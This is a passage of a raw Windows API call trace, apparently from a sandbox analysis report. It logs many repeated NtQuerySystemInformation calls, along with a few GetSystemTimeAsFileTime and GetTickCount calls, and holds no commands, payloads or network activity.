SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x20, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.376] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc751dfcc20 | out: lpSystemTimeAsFileTime=0xc751dfcc20*(dwLowDateTime=0x437e86f, dwHighDateTime=0x1d5fb6f)) [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd8, Length=0x50, ResultLength=0x0) [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc10, Length=0x28, ResultLength=0x0) [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0273.376] GetTickCount () returned 0x1184a45 [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0273.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x20, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x38, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f8, Length=0x58, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5f0, Length=0x20, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8c0, Length=0x58, ResultLength=0x0) [0273.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc680, Length=0x28, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7e0, Length=0x38, ResultLength=0x0) [0273.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x28, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, 